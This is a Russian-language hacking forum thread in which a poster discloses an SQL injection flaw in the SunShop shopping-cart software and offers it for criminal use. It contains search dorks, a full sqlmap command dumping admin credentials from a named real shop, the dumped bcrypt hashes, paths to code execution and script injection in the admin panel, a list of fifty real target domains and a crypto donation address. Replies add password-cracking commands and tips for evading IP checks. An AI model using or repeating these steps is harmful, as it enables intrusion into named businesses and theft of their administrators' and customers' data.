What's new
By:
Filters
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

[LVL 1] 1337 H4k GAME

M

mzh

Midle Weight
Депозит
$0
* intro

Было приятно читать прошлый топик, очень жаль, что ни кто кому было интересно найти мои контакты не догадался расшифровать сообщение в подписи. Я принял для себя решение, пусть мы не собрали в прошлом топике ту сумму на которую я расчитывал , а с моей пропажей переводы вообще остановились, я все равно продолжу и постараюсь сделать публикацию подобных постов ежегодным. Сегодня я хочу рассказать об уязвимости которой удавалось оставатся в тайне 10 лет и оставалась такой по сей день.


* CMS


Достаточно популярная CMS - есть процессинги. Платный движек, минимум шопов без ордеров.

exploit-db.com - последний баг датирован 2008 годом. SunShop.



* search


Дорки для гугла : "SunShop Login" , Powered by SunShop "Shopping Cart Software"


* 0day


заходим на сайт выбираем товар, меняем параметр размера, смострим в отладку.


Получаем реальное значение поля option (вспоминаем что такое x8). Вообще по большому секрету скажу, что там вообще все поля option во всех скриптах уязвимы к SQLi, стоит лиш добавить им sleep(10);

Код:
Скопировать в буфер обмена
/index.php?l=addtocart

option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1

[code/]


Отправляем в sql-map

Code: 
sqlmap -u "index.php?l=addtocart" --data="option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1" --technique=B --dbms=MySQL --batch  --answers=attack?=n,continue?=y --risk=3 --level=2 --time-sec=15 --timeout=100 --text-only --threads=10 -D alexande_alexanderelitefashions -T ss_admins -C username,password --dump --random-agent --threads=10 --sql-shell


Получаем зашифрованные аккаунты администраторов


Код:
Скопировать в буфер обмена
| alexanderfashions | $2y$10$0red092Yqc./Ln9O4AGmxe65ZU62EbH6ZT1qkiYT2n7fqtW0Uv8Pq |

| twtadmin          | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO |


/admin/ стандартный путь к админке.



в административной панли обращаем внимание на

Код:
Скопировать в буфер обмена
admin/adminindex.php?action=settings&sub=general


* rce?


Код:
Скопировать в буфер обмена
mail method - позволяет указать запускаемый скрипт (/usr/sbin/sendmail);

cURL connect - /usr/bin/curl


* Shop Phone Number: etc, позволяют вставить js.

* admin/adminindex.php?action=settings&sub=templates - редактор темплэйтов посзволяет вставить ваш код

Редактор бд смахивает на опенкарт, /admin/adminindex.php?action=settings&sub=backup : )




В этот раз копим 10000$ LTC: ltc1qrm8wlwl7nm04n75ry8f65p9q262g27sulx225z Первый контакт, ПМ. Неделю точно буду на этом аккаунте.
 
Тишина какая-то, жуть. Понимаю, стало посложнее. Но не до такой-же степени, что-бы совсем не выполнимо.

1. aheavenlypie.com
2. alexanderelitefashions.com
3. allaboutdogsinc.com
4. arrowtooling.com
5. bouncers2u.com
6. boxstockproject.com
7. canyonlakegunsmithing.com
8. chefhansgourmetfoods.com
9. commercialrefrigerationboston.com
10. commercialrefrigerationlongisland.com
11. cumingsnets.com
12. customharleyparts.com
13. damagedear.com
14. debscookiesandtreats.com
15. digitalhippo.com
16. earleybirdnursery.com
17. earleybirdsnursery.com
18. elimia.com
19. fireequipmentassociates.com
20. gettinsaltyapparel.com
21. goodecrowleytheater.org
22. huskyvape.com
23. ieputtinggreens.com
24. jaggedtoothtackle.com
25. juliasindokitchen.com
26. khcsports.com
27. lanmarkalternatives.com
28. lanmarkwholesale.com
29. lecturesdefrance.com
30. lifelineint.com
31. locustgroveappliance.com
32. ma-distribution.com
33. masontackle.com
34. mddcstore.net
35. mercarusa.com
36. motherlinks.com
37. murrietawebdesigns.com
38. neworleansgiftstore.com
39. newporttackle.com
40. ptavideostore.com
41. raymondsmarine.com
42. rebelrails.com
43. rice2008.com
44. roofinglosangelesca.org
45. saltydogapparel.com
46. seascape-roatan.com
47. tarocraft.com
48. ufranks.com
49. vapinlizards.com
50. whittiertintshop.com
 
mzh сказал(а):
Тишина какая-то, жуть. Понимаю, стало посложнее. Но не до такой-же степени, что-бы совсем не выполнимо.

1. aheavenlypie.com
2. alexanderelitefashions.com
3. allaboutdogsinc.com
4. arrowtooling.com
5. bouncers2u.com
6. boxstockproject.com
Нажмите, чтобы раскрыть...
Click to expand...



Скрытый контент для пользователей: mzh.
Последнее редактирование: 01.02.2024
 
Ott_Fon_Bismark сказал(а):
Скрытое содержимое
Click to expand...

https://www.alexanderelitefashions.com/ -> выбираем_любой_товар -> https://www.alexanderelitefashions.com/index.php?l=product_detail&p=1840 -> меняем_размер_например -> получаем опнш, -> добавляем в корзину опять опшн. Там они кругом.
Для простоты ты можешь добавить к запросу SQLMAP - параметр form и он проверит все формы.
 
У меня вопрос, а как декодировать пароль такого вида - retrieved: $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO ?
 
hashcat 3200 вроде
-------------------------
Сканирование списка доменов на сигнатуры в коде - /threads/79878/
 
Error!
The IP address you are attempting to login from cannot be verified. Please check your email to approve the login.
Сайты, которые просят айпи скипать?
 
amur312 сказал(а):
Error!
The IP address you are attempting to login from cannot be verified. Please check your email to approve the login.
Сайты, которые просят айпи скипать?
Click to expand...

| twtadmin | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO | admin
Эта учетная запись есть везде, и везде нужно угадать IP. Попробуй спарсить IP из базы и поискать proxy/vpn из под той-же подсети. Что касается bcrypt. Это не небрутабельный алгоритм, а алгоритм который не сбрутишь на домашнем компьютере так быстро как тебе хотелось бы. Гугли по запросу - аренда GPU ну и как минимум стоит пробовать https://cmd5.com/
 
amur312 сказал(а):
У меня вопрос, а как декодировать пароль такого вида - retrieved: $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO ?
Click to expand...

Это бкрипт вспотеете расшифровывать.
 
Благодарю за статью, надо будет написать сканнер на CMS.
 
Подкину еще пару целей для практики:


У вас должно быть более 1 реакций для просмотра скрытого контента.
-------------------------
Сканирование списка доменов на сигнатуры в коде - /threads/79878/
 
0blako сказал(а):
https://www.rebelrails.com/index.php?l=product_detail&p=3715 - а здесь как действовуешь?
{
"product[id]": "3715",
"product[quantity]": "1",
"option[769]": "3464"
}


{
"option[769]": "3467",
"product[id]": "3715",
"regid": "",
"product[quantity]": "1"
}
Нажмите, чтобы раскрыть...
Click to expand...

меняй размер, и захватывай через бурп пост запрос
 
weakem сказал(а):
меняй размер, и захватывай через бурп пост запрос
Click to expand...

web server operating system: Linux CentOS

web application technology: PHP 7.4.33, Apache 2.4.58

back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
Последнее редактирование: 07.02.2024
 
DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало
Последнее редактирование: 07.02.2024
 
0blako сказал(а):
DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало
Click to expand...
hashcat -a 0 -m 3200 hashes.txt ./rockyou.txt
john --format=bcrypt --wordlist=rockyou.txt hashes.txt
Click to expand...

Хэши необходимо расшифровывать. В сообщение от @get_com пояснение по алгоритму.
 
mzh сказал(а):
Получаем реальное значение поля option (вспоминаем что такое x8).
Click to expand...
Здравствуйте, спасибо за статью.

А можно тут подробнее раскрыть? Что нужно со-значением сделать?
 
You must log in or register to reply here.
Top